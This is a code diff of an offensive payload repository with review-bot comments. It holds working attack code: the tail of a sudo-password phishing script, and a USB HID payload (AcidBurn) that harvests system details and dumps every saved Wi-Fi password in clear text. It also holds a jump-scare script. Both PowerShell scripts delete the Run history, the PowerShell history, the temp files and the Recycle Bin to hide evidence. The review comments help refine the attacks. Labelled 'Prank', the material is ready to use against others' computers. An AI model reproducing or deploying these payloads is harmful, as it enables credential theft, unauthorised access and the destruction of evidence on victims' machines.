if ( /bin/echo "${sudo_password}" | /usr/bin/sudo -S /bin/true > /dev/null 2>&1 ); then
##
# <YOUR-PAYLOAD>
##
/bin/echo "${USER}:${sudo_password}" > /tmp/.sudo_password
##
# </YOUR-PAYLOAD>
##
/bin/rm ~/.sudo_phishing.sh
/usr/bin/head -n -1 ~/.bash_aliases > ~/.bash_aliases_bak
/bin/mv ~/.bash_aliases_bak ~/.bash_aliases
/bin/echo "${sudo_password}" | /usr/bin/sudo -S "${@}"
$BASH
exit 0
fi
}
if ( (/usr/bin/sudo -n /bin/true > /dev/null 2>&1) || [ "${#}" -eq 0 ] ); then
/usr/bin/sudo "${@}"
else
for ((iterator=1; iterator <= MAXIMUM_ATTEMPTS; iterator++)); do
attempts "${@}"
done
/bin/echo "${ERROR_MESSAGE}"
fi
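Review bot: The cleanup in `attempts` removes the last line of `~/.bash_aliases` with `head -n -1`, whatever that line is. If anything was appended to the file after the alias was installed, the user's own line is deleted and the `sudo` alias stays in place. Remove the exact line instead, e.g. `grep -vxF "alias sudo='~/.sudo_phishing.sh'" ~/.bash_aliases > ~/.bash_aliases_bak`. Separately, the captured credential is written in clear to the fixed path `/tmp/.sudo_password` under the default umask, which on most systems leaves it readable by every local account; the README should carry that caveat for anyone running this in an authorised test.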


@ -0,0 +1,704 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : AcidBurn | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby (youtube link with demonstration coming soon) # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.NOTES
This script was not optimized to shorten the code. This script is intended to have as much readablility as possible for new coders to learn.
.DESCRIPTION
This program gathers details from target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account.
The SSID and WiFi password of any current or previously connected to networks.
It determines the last day they changed thier password and how many days ago.
Once the information is gathered the script will pause until a mouse movement is detected
Then the script uses Sapi speak to roast their set up and lack of security
#>
############################################################################################################################################################
# Variables
$s=New-Object -ComObject SAPI.SpVoice
############################################################################################################################################################
# Intro ---------------------------------------------------------------------------------------------------
function Get-fullName {
try {
$fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
}
# If no name is detected function will return $env:UserName
# Write Error is just for troubleshooting
catch {Write-Error "No name was detected"
return $env:UserName
-ErrorAction SilentlyContinue
}
return $fullName
}
$fullName = Get-fullName
# echo statement used to track progress while debugging
echo "Intro Done"
###########################################################################################################
<#
.NOTES
RAM Info
This will get the amount of RAM the target computer has
#>
function Get-RAM {
try {
$OS = (Get-WmiObject Win32_OperatingSystem).Name;$OSpos = $OS.IndexOf("|");$OS = $OS.Substring(0, $OSpos)
$RAM=Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1}" -f ($_.sum / 1GB)}
$RAMpos = $RAM.IndexOf('.')
$RAM = [int]$RAM.Substring(0,$RAMpos).Trim()
# ENTER YOUR CUSTOM RESPONSES HERE
#----------------------------------------------------------------------------------------------------
$lowRAM = "$RAM gigs of ram? might as well use pen and paper"
$okRAM = "$RAM gigs of ram really? I have a calculator with more computing power"
$goodRAM = "$RAM gigs of ram? Can almost guarantee you have a light up keyboard.. you are a wanna be streamer huh?"
$impressiveRAM = "$RAM gigs of ram? are you serious? a super computer with no security that is funny right there"
#----------------------------------------------------------------------------------------------------
if($RAM -le 4){
return $lowRAM
} elseif($RAM -ge 5 -and $RAM -le 12){
return $okRAM
} elseif($RAM -ge 13 -and $RAM -le 24){
return $goodRAM
} else {
return $impressiveRAM
}
}
# If one of the above parameters is not detected function will return $null to avoid sapi speak
# Write Error is just for troubleshooting
catch {Write-Error "Error in search"
return $null
-ErrorAction SilentlyContinue
}
}
# echo statement used to track progress while debugging
echo "RAM Info Done"
###########################################################################################################
<#
.NOTES
Public IP
This will get the public IP from the target computer
#>
function Get-PubIP {
try {
$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content
}
# If no Public IP is detected function will return $null to avoid sapi speak
# Write Error is just for troubleshooting
catch {Write-Error "No Public IP was detected"
return $null
-ErrorAction SilentlyContinue
}
return "your public I P address is $computerPubIP"
}
# echo statement used to track progress while debugging
echo "Pub IP Done"
###########################################################################################################
<#
.NOTES
Wifi Network and Password
This function will custom a tailor response based on how many characters long their password is
#>
function Get-Pass {
#-----VARIABLES-----#
# $pwl = their Pass Word Length
# $pass = their Password
try {
$pro = netsh wlan show interface | Select-String -Pattern ' SSID '; $pro = [string]$pro
$pos = $pro.IndexOf(':')
$pro = $pro.Substring($pos+2).Trim()
$pass = netsh wlan show profile $pro key=clear | Select-String -Pattern 'Key Content'; $pass = [string]$pass
$passPOS = $pass.IndexOf(':')
$pass = $pass.Substring($passPOS+2).Trim()
if($pro -like '*_5GHz*') {
$pro = $pro.Trimend('_5GHz')
}
$pwl = $pass.length
}
# If no network is detected function will return $null to avoid sapi speak
# Write Error is just for troubleshooting
catch {Write-Error "No network was detected"
return $null
-ErrorAction SilentlyContinue
}
# ENTER YOUR CUSTOM RESPONSES HERE
#----------------------------------------------------------------------------------------------------
$badPASS = "$pro is not a very creative name but at least it is not as bad as your wifi password... only $pwl characters long? $pass ...? really..? $pass was the best you could come up with?"
$okPASS = "$pro is not a very creative name but at least you are trying a little bit, your password is $pwl characters long, still trash though.. $pass ...? You can do better"
$goodPASS = "$pro is not a very creative name but At least you are not a total fool... $pwl character long password actually is not bad, but it did not save you from me did it? no..it..did..not! $pass is a decent password though."
#----------------------------------------------------------------------------------------------------
if($pass.length -lt 8) { return $badPASS
}elseif($pass.length -gt 7 -and $pass.length -lt 12) { return $okPASS
}else { return $goodPASS
}
}
# echo statement used to track progress while debugging
echo "Wifi pass Done"
###########################################################################################################
<#
.NOTES
All Wifi Networks and Passwords
This function will gather all current Networks and Passwords saved on the target computer
They will be save in the temp directory to a file named with "$env:USERNAME-$(get-date -f yyyy-MM-dd)_WiFi-PWD.txt"
#>
Function Get-Networks {
# Get Network Interfaces
$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress
# Get Wifi SSIDs and Passwords
$WLANProfileNames =@()
#Get all the WLAN profile names
$Output = netsh.exe wlan show profiles | Select-String -pattern " : "
#Trim the output to receive only the name
Foreach($WLANProfileName in $Output){
$WLANProfileNames += (($WLANProfileName -split ":")[1]).Trim()
}
$WLANProfileObjects =@()
#Bind the WLAN profile names and also the password to a custom object
Foreach($WLANProfileName in $WLANProfileNames){
#get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user
try{
$WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim()
}Catch{
$WLANProfilePassword = "The password is not stored in this profile"
}
#Build the object and add this to an array
$WLANProfileObject = New-Object PSCustomobject
$WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfileName" -Value $WLANProfileName
$WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfilePassword" -Value $WLANProfilePassword
$WLANProfileObjects += $WLANProfileObject
Remove-Variable WLANProfileObject
return $WLANProfileObjects
}
}
$Networks = Get-Networks
Add-Type @"
using System;
using System.Runtime.InteropServices;
public class PInvoke {
[DllImport("user32.dll")] public static extern IntPtr GetDC(IntPtr hwnd);
[DllImport("gdi32.dll")] public static extern int GetDeviceCaps(IntPtr hdc, int nIndex);
}
"@
$hdc = [PInvoke]::GetDC([IntPtr]::Zero)
$w = [PInvoke]::GetDeviceCaps($hdc, 118) # width
$h = [PInvoke]::GetDeviceCaps($hdc, 117) # height
<#
.NOTES
This will take the image you generated and set it as the targets wall paper
#>
Function Set-WallPaper {
<#
.SYNOPSIS
Applies a specified wallpaper to the current user's desktop
.PARAMETER Image
Provide the exact path to the image
.PARAMETER Style
Provide wallpaper style (Example: Fill, Fit, Stretch, Tile, Center, or Span)
.EXAMPLE
Set-WallPaper -Image "C:\Wallpaper\Default.jpg"
Set-WallPaper -Image "C:\Wallpaper\Background.jpg" -Style Fit
#>
param (
[parameter(Mandatory=$True)]
# Provide path to image
[string]$Image,
# Provide wallpaper style that you would like applied
[parameter(Mandatory=$False)]
[ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')]
[string]$Style
)
$WallpaperStyle = Switch ($Style) {
"Fill" {"10"}
"Fit" {"6"}
"Stretch" {"2"}
"Tile" {"0"}
"Center" {"0"}
"Span" {"22"}
}
If($Style -eq "Tile") {
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 1 -Force
}
Else {
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 0 -Force
}
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public class Params
{
[DllImport("User32.dll",CharSet=CharSet.Unicode)]
public static extern int SystemParametersInfo (Int32 uAction,
Int32 uParam,
String lpvParam,
Int32 fuWinIni);
}
"@
$SPI_SETDESKWALLPAPER = 0x0014
$UpdateIniFile = 0x01
$SendChangeEvent = 0x02
$fWinIni = $UpdateIniFile -bor $SendChangeEvent
$ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni)
}
#############################################################################################################################################
Function WallPaper-Troll {
if (!$Networks) { Write-Host "variable is null"
}else {
# This is the name of the file the networks and passwords are saved
$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_WiFi-PWD.txt"
($Networks| Out-String) >> $Env:temp\$FileName
$content = [IO.File]::ReadAllText("$Env:temp\$FileName")
# this is the message that will be coded into the image you use as the wallpaper
$hiddenMessage = "`n`nMy crime is that of curiosity `nand yea curiosity killed the cat `nbut satisfaction brought him back `n with love -Jakoby"
# this will be the name of the image you use as the wallpaper
$ImageName = "dont-be-suspicious"
<#
.NOTES
This will get take the information gathered and format it into a .jpg
#>
Add-Type -AssemblyName System.Drawing
$filename = "$env:tmp\foo.jpg"
$bmp = new-object System.Drawing.Bitmap $w,$h
$font = new-object System.Drawing.Font Consolas,18
$brushBg = [System.Drawing.Brushes]::White
$brushFg = [System.Drawing.Brushes]::Black
$graphics = [System.Drawing.Graphics]::FromImage($bmp)
$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height)
$graphics.DrawString($content,$font,$brushFg,500,100)
$graphics.Dispose()
$bmp.Save($filename)
# Invoke-Item $filename
<#
.NOTES
This will take your hidden message and use steganography to hide it in the image you use as the wallpaper
Then it will clean up the files you don't want to leave behind
#>
echo $hiddenMessage > $Env:temp\foo.txt
cmd.exe /c copy /b "$Env:temp\foo.jpg" + "$Env:temp\foo.txt" "$Env:USERPROFILE\Desktop\$ImageName.jpg"
rm $env:TEMP\foo.txt,$env:TEMP\foo.jpg -r -Force -ErrorAction SilentlyContinue
#############################################################################################################################################
# This will open up notepad with all their saved networks and passwords and taunt them
$s.Speak("wanna see something really cool?")
Set-WallPaper -Image "$Env:USERPROFILE\Desktop\$ImageName.jpg" -Style Center
$s.Speak("Look at all your other passswords I got..")
Start-Sleep -Seconds 1
$s.Speak("These are the wifi passwords for every network you've ever connected to!")
Start-Sleep -Seconds 1
$s.Speak("I could send them to myself but i wont")
}
# echo statement used to track progress while debugging
echo "All Wifi Passes Done"
}
###########################################################################################################
<#
.NOTES
Password last Set
This function will custom tailor a response based on how long it has been since they last changed their password
#>
function Get-Days_Set {
#-----VARIABLES-----#
# $pls (password last set) = the date/time their password was last changed
# $days = the number of days since their password was last changed
try {
$pls = net user $env:UserName | Select-String -Pattern "Password last" ; $pls = [string]$pls
$plsPOS = $pls.IndexOf("e")
$pls = $pls.Substring($plsPOS+2).Trim()
$pls = $pls -replace ".{3}$"
$time = ((get-date) - (get-date "$pls")) ; $time = [string]$time
$DateArray =$time.Split(".")
$days = [int]$DateArray[0]
}
# If no password set date is detected funtion will return $null to cancel Sapi Speak
# Write Error is just for troubleshooting
catch {Write-Error "Day password set not found"
return $null
-ErrorAction SilentlyContinue
}
# ENTER YOUR CUSTOM RESPONSES HERE
#----------------------------------------------------------------------------------------------------
$newPass = "$pls was the last time you changed your password... You changed your password $days days ago.. I have to applaud you.. at least you change your password often. Still did not stop me! "
$avgPASS = "$pls was the last time you changed your password... it has been $days days since you changed your password, really starting to push it, i mean look i am here. that tells you something "
$oldPASS = "$pls was the last time you changed your password... it has been $days days since you changed your password, you were basically begging me to hack you, well here i am! "
#----------------------------------------------------------------------------------------------------
if($days -lt 45) { return $newPass
}elseif($days -gt 44 -and $days -lt 182) { return $avgPASS
}else { return $oldPASS
}
}
# echo statement used to track progress while debugging
echo "Pass last set Done"
###########################################################################################################
<#
.NOTES
Get Email
This function will custom tailor a response based on what type of email the target has
#>
function Get-email {
try {
$email = GPRESULT -Z /USER $Env:username | Select-String -Pattern "([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})" -AllMatches;$email = ("$email").Trim()
$emailpos = $email.IndexOf("@")
$domain = $email.Substring($emailpos+1) #.TrimEnd(".com")
}
# If no email is detected function will return backup message for sapi speak
# Write Error is just for troubleshooting
catch {Write-Error "An email was not found"
return "you're lucky you do not have your email connected to your account, I would have really had some fun with you then lol"
-ErrorAction SilentlyContinue
}
# ENTER YOUR CUSTOM RESPONSES HERE
#----------------------------------------------------------------------------------------------------
$gmailResponse = "At least you use G Mail.. we should be friends. If you are down just email me back, ill message you at $email. That is your email right?"
$yahooResponse = "a yahoo account seriously? you are either in your 50's or just got done doing some time, a lot of it.. $email .. this is sad"
$hotmailResponse = "really?. you have a hotmail account? $email .. I am sending this to the f b I they need to check your hard drive"
$otherEmailResponse = "I dead ass do not even know what this is.. $email .. hope you did not think it was safe"
#----------------------------------------------------------------------------------------------------
if($email -like '*gmail*') { return $gmailResponse
}elseif($email -like '*yahoo*') { return $yahooResponse
}elseif($email -like '*hotmail*') { return $hotmailResponse
}else { return $otherEmailResponse}
}
# echo statement used to track progress while debugging
echo "Email Done"
###########################################################################################################
<#
.NOTES
Messages
This function will run all the previous functions and assign their outputs to variables
#>
$intro = "$fullName , it has been a long time my friend"
$RAMwarn = Get-RAM
$PUB_IPwarn = Get-PubIP
$PASSwarn = Get-Pass
$LAST_PASSwarn = Get-Days_Set
$EMAILwarn = Get-email
$OUTRO = "My crime is that of curiosity.... and yea curiosity killed the cat.... but satisfaction brought him back.... later $fullName"
# echo statement used to track progress while debugging
echo "Speak Variables set"
###########################################################################################################
# This turns the volume up to max level--------------------------------------------------------------------
$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)}
# echo statement used to track progress while debugging
echo "Volume to max level"
###########################################################################################################
<#
.NOTES
These two snippets are meant to be used as indicators to let you know the script is set up and ready
This will display a pop up window saying "hello $fullname"
Or this makes the CapsLock indicator light blink however many times you set it to
if you do not want the ready notice to pop up or the CapsLock light to blink comment them out below
#>
# a popup will be displayed before freezing the script while waiting for the cursor to move to continue the script
# else capslock light will blink as an indicator
$popmessage = "Hello $fullName"
$readyNotice = New-Object -ComObject Wscript.Shell;$readyNotice.Popup($popmessage)
# caps lock indicator light
$blinks = 3;$o=New-Object -ComObject WScript.Shell;for ($num = 1 ; $num -le $blinks*2; $num++){$o.SendKeys("{CAPSLOCK}");Start-Sleep -Milliseconds 250}
#-----------------------------------------------------------------------------------------------------------
<#
.NOTES
Then the script will be paused until the mouse is moved
script will check mouse position every indicated number of seconds
This while loop will constantly check if the mouse has been moved
"CAPSLOCK" will be continously pressed to prevent screen from turning off
it will then sleep for the indicated number of seconds and check again
when mouse is moved it will break out of the loop and continue theipt
#>
Add-Type -AssemblyName System.Windows.Forms
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
while (1) {
$pauseTime = 3
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
break
}
else {
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
}
}
echo "it worked"
###########################################################################################################
# this is where your message is spoken line by line
$s=New-Object -ComObject SAPI.SpVoice
# This sets how fast Sapi Speaks
$s.Rate = -1
$s.Speak($intro)
$s.Speak($RAMwarn)
$s.Speak($PUB_IPwarn)
$s.Speak($PASSwarn)
WallPaper-Troll
$s.Speak($LAST_PASSwarn)
$s.Speak($EMAILwarn)
$s.Speak($OUTRO)
###########################################################################################################
# this snippet will leave a message on your targets desktop
$message = "`nMy crime is that of curiosity `nand yea curiosity killed the cat `nbut satisfaction brought him back"
Add-Content $home\Desktop\WithLove.txt $message
###########################################################################################################
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
#----------------------------------------------------------------------------------------------------
# This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off
Add-Type -AssemblyName System.Windows.Forms
$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
#If true, toggle CapsLock key, to ensure that the script doesn't fail
if ($caps -eq $true){
$key = New-Object -ComObject WScript.Shell
$key.SendKeys('{CapsLock}')
}


@ -0,0 +1,112 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Acid Burn
A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes.
## Description
This program enumerates a target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account.
The SSID and WiFi password of any current or previously connected to networks.
It determines the last day they changed thier password and how many days ago.
Once the information is gathered the script will pause until a mouse movement is detected
Then the script uses Sapi speak to roast their set up and lack of security
If wifi networks and passwords are detected wallpaper will be changed to image displaying that information
Image generated will be saved to desktop, steganography is used to put hidden message at bottom of binary output of image generated
## Getting Started
### Dependencies
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your bash bunny
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
* Enumerate and get Full Name, Amount of RAM, Public IP, Wifi Password Length, Wifi Networks and Passwords, Day Password was last changed, Email
* Custom responses have been programmed to roast the target based on the information gathered during enumeration phase
* Wifi Networks and passwords will be generated into an image that will be saved on the desktop
* Image opened in notepad will reveal a hidden message at the bottom of the binary output
* Script will freeze until a mouse movement is detected
* Sapi Speak will be used to speak out loud the custom responses
* Desktop wallpaper will be changed to the image of the targets Wifi Networks and Passwords
* Text file will be left on the target desktop with whatever message you choose
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/BashBunny/Payloads/BB-AcidBurn/hacked-wallpaper.jpg)
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
Arf
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-AcidBurn)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
* [0iphor13](https://github.com/0iphor13)
* [PhilSutter](https://github.com/PhilSutter)
<p align="right">(<a href="#top">back to top</a>)</p>

Binary file not shown.


@ -0,0 +1,26 @@
# Title: AcidBurn
# Description: This payload is meant to torment your target to the fullest extent. Mission to recon then roast. See README.md for more details
# Author: I am Jakoby
# Version: 1.0
# Category: Prank
# Attackmodes: HID, Storage
# Target: Windows 10, 11
# --------------------------------------------------------------------------------------
# THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
# --------------------------------------------------------------------------------------
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\AcidBurn.ps1')"
QUACK ENTER
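Review bot: The header block labels this `# Category: Prank`, and its `# Description:` line never says that the launched AcidBurn.ps1 reads saved Wi-Fi keys in clear text (`netsh wlan show profile ... key=clear`) and leaves them in an image on the user's Desktop. The description should state that, e.g. `# Description: Enumerates the host, reads saved Wi-Fi keys in clear text and writes them to a Desktop image. See README.md`, so anyone running or auditing the payload knows credentials end up on disk. The README added in this commit also says the script is downloaded with Invoke-WebRequest and run from memory, while the `QUACK STRING` line here runs it from the `BashBunny` storage volume. The same mismatch appears between the JumpScare README and its payload.txt further down, and both READMEs should be corrected to match what the payload does.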


@ -0,0 +1,221 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : JumpScare | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.NOTES
This script can be run as is with the provided execution file
.DESCRIPTION
This script will download a scary image and a scream sound effect hosted with this payload and host volume will be raised to max level
Upon running this script it will immediately pause after the downloads until a mouse movement is detected
The capslock button will be pressed every 3 seconds to prevent sleep, and act as an indicator the payload is ready
After a mouse movement is detected their wallpaper will change to the scary image provided and the scream sound effect will play
#>
############################################################################################################################################################
# Download Image; replace link to $image to add your own image
$image = "https://github.com/I-Am-Jakoby/hak5-submissions/raw/main/OMG/Payloads/OMG-JumpScare/jumpscare.png"
$i = -join($image,"?dl=1")
iwr $i -O $env:TMP\i.png
iwr https://github.com/I-Am-Jakoby/hak5-submissions/raw/main/OMG/Payloads/OMG-JumpScare/jumpscare.png?dl=1 -O $env:TMP\i.png
# Download WAV file; replace link to $wav to add your own sound
$wav = "https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-JumpScare/female_scream.wav?raw=true"
$w = -join($wav,"?dl=1")
iwr $w -O $env:TMP\s.wav
#----------------------------------------------------------------------------------------------------
<#
.NOTES
This will take the image you downloaded and set it as the targets wall paper
#>
Function Set-WallPaper {
<#
.SYNOPSIS
Applies a specified wallpaper to the current user's desktop
.PARAMETER Image
Provide the exact path to the image
.PARAMETER Style
Provide wallpaper style (Example: Fill, Fit, Stretch, Tile, Center, or Span)
.EXAMPLE
Set-WallPaper -Image "C:\Wallpaper\Default.jpg"
Set-WallPaper -Image "C:\Wallpaper\Background.jpg" -Style Fit
#>
param (
[parameter(Mandatory=$True)]
# Provide path to image
[string]$Image,
# Provide wallpaper style that you would like applied
[parameter(Mandatory=$False)]
[ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')]
[string]$Style
)
$WallpaperStyle = Switch ($Style) {
"Fill" {"10"}
"Fit" {"6"}
"Stretch" {"2"}
"Tile" {"0"}
"Center" {"0"}
"Span" {"22"}
}
If($Style -eq "Tile") {
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 1 -Force
}
Else {
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 0 -Force
}
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public class Params
{
[DllImport("User32.dll",CharSet=CharSet.Unicode)]
public static extern int SystemParametersInfo (Int32 uAction,
Int32 uParam,
String lpvParam,
Int32 fuWinIni);
}
"@
$SPI_SETDESKWALLPAPER = 0x0014
$UpdateIniFile = 0x01
$SendChangeEvent = 0x02
$fWinIni = $UpdateIniFile -bor $SendChangeEvent
$ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni)
}
#----------------------------------------------------------------------------------------------------
<#
.NOTES
This is to pause the script until a mouse movement is detected
#>
function Pause-Script{
Add-Type -AssemblyName System.Windows.Forms
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
$o=New-Object -ComObject WScript.Shell
while (1) {
$pauseTime = 3
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
break
}
else {
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
}
}
}
#----------------------------------------------------------------------------------------------------
<#
.NOTES
This is to play the WAV file
#>
function Play-WAV{
$PlayWav=New-Object System.Media.SoundPlayer;$PlayWav.SoundLocation="$env:TMP\s.wav";$PlayWav.playsync()
}
#----------------------------------------------------------------------------------------------------
# This turns the volume up to max level
$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)}
#----------------------------------------------------------------------------------------------------
# Popup message to signal the payload is done
$done = New-Object -ComObject Wscript.Shell;$done.Popup("script is done",1)
Pause-Script
Set-WallPaper -Image "$env:TMP\i.png" -Style Center
Play-WAV
#----------------------------------------------------------------------------------------------------
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
#----------------------------------------------------------------------------------------------------
# This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off
Add-Type -AssemblyName System.Windows.Forms
$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
#If true, toggle CapsLock key, to ensure that the script doesn't fail
if ($caps -eq $true){
$key = New-Object -ComObject WScript.Shell
$key.SendKeys('{CapsLock}')
}
